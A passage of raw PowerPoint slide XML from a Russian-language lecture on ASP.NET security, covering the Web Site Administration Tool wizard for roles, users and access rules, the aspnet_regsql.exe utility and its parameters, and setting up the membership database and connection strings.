              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Роли это фактически группы членов, которые могут потребоваться в большинстве сценариев поддержки членства</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Для создания ролей нужно задать флажок «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Enable Roles For This Web Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>»</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Затем нажмите </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Next.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>8.   Если выбрано создание ролей, то мастер покажет страницу, на которой можно создать роли.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Например, можно создать роли для </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>и</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> Administrators. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>После этого нажмите </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Next.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>9.   На шаге </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>5, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>можно создать учетные записи пользователей вводя требуемую информацию и затем нажимая «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Create User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>»</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Пользователей можно будет добавить и позже. После создания учетных записей нажмите </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Next.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>0. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>На шаге </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>6, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>добавьте правила доступа для указания того, к каким папкам имеют доступ пользователи и роли</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Затем нажмите </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Next. </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>11. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>На шаге 7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>нажмите «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Finish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>»</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>После этого вы вернетесь к панели «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>» в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Web Site Administration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Tool, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>где можно управлять пользователями, ролями и правилами доступа</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="20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Where’s the data?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3556000" y="3784600"/>
            <a:ext cx="9144000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12292" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1085850"/>
            <a:ext cx="9144000" cy="5772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68313" y="260350"/>
            <a:ext cx="8229600" cy="865188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3600" smtClean="0"/>
              <a:t>Автоматическое создание хранилища данных</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113667" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="5068888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Если ASP.NET используется на компьютере с SQL Server Express Edition, то не даже нужно создавать хранилище данных и конфигурировать membership провайдера. Нужно просто перейдите на страницу Безопасность (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>ecurity) в WAT и начните добавлять пользователей в хранилище учетных записей. Требуемой хранилище данных будет создано автоматически при создании первого пользователя. Такая функциональность предоставляется с помощью провайдера SqlMembershipProvider. Однако это работает только с SQL Server 2005 Express Edition! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Если используется другой SQL Server, то нужно сконфигурировать хранилище данных вручную.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Новый файл базы данных с именем ASPNETDB.MDB создается в специальной подпапке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>приложения App_Data. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>В этой базе данных создается полная схема, которая необходима для хранения и управления информации об </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>учетных записях пользователя;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>ролях пользователей;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>отнесении пользователей к ролям;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>данных персонализации и профайлы пользователей.</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endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114691" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="5068888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>После подключения инфраструктуры, ASP.NET автоматически создает БД в виде </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>MDB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>файла ASPNETDB.MDF, в папке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>приложения App_Data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Если требуется использовать собственное хранилище, то необхождимо выполнить следующие шаги:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Создать хранилище данных с помощью или aspnet_regsql.exe или выполняя командный скрипт TSQL, который хранится в папке .NET Framework.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Сконфигурировать провайдер ролей для использования ранее созданное собственное хранилище данных. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Можно сконфигурировать провайдер ролей с помощью тэга &lt;roleManager&gt;. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Можно использовать или другую БД или полностью другой тип хранилища. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Дополнительно можно сконфигурировать некоторые свойства с помощью тэга&lt;roleManager&gt;, которые не могут быть установлены в программе WAT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>	&lt;configuration&gt;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ru-RU" sz="3200" b="1" smtClean="0"/>
              <a:t>Ручное создание хранилища данных</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3600" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115715" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8686800" cy="4997450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>В </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>ASP.Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>имеется</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>утилита </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>net_regsql.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t> для создания базы данных </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>приложения для работы с учетными записями.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Два интерфейса</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Wizard interface (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>мастер</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Интерфейс командной строки</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Имеется скрипт InstallCommon.sql для создания БД</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>sqlcmd -S (local)\SQLExpress -E -i InstallCommon.sql</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU"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274638"/>
            <a:ext cx="8229600" cy="850900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>Wizard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t> интерфейс утилиты as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>net_regsql.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116739" name="Picture 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1116013" y="1427163"/>
            <a:ext cx="6681787" cy="5430837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ru-RU"/>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274638"/>
            <a:ext cx="8435975" cy="490537"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3600" smtClean="0"/>
              <a:t>Параметры утилиты aspnet_regsql.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="136320" name="Group 128"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="981075"/>
          <a:ext cx="8229600" cy="5716588"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1450975"/>
                <a:gridCol w="6778625"/>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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Параметр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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Описание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-S имя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Задает имя SQL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-U имя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Имя пользователя БД.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-P </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>psw</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="ru-RU"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Если задан -U, то нужно задать пароль.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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>d</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="ru-RU"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Позволяет указать имя базы данных, в которую нужно записать таблицы. Если не задано, то создается БД с именем aspnetdb.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Если не задано -U и -P, то выполняется соединение с </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>SQL </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="ru-RU" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>сервером с использованием учетной записи Windows.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Позволяет указать полную строку соединения с использованием ODBC или OLEDB.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4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Установит сервисы приложения. Правильные значени: m, r, p, c и w. Здесь: m - утановить membership; r - становить role сервисы, p - profiles, c – персонализация web part страниц, w - SQL web event provider.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274638"/>
            <a:ext cx="8229600" cy="561975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>Конфигурирование строки соединения и провайдера</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118787" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1196975"/>
            <a:ext cx="8229600" cy="5400675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>Задание строки соединения</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>&lt;connectionStrings&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
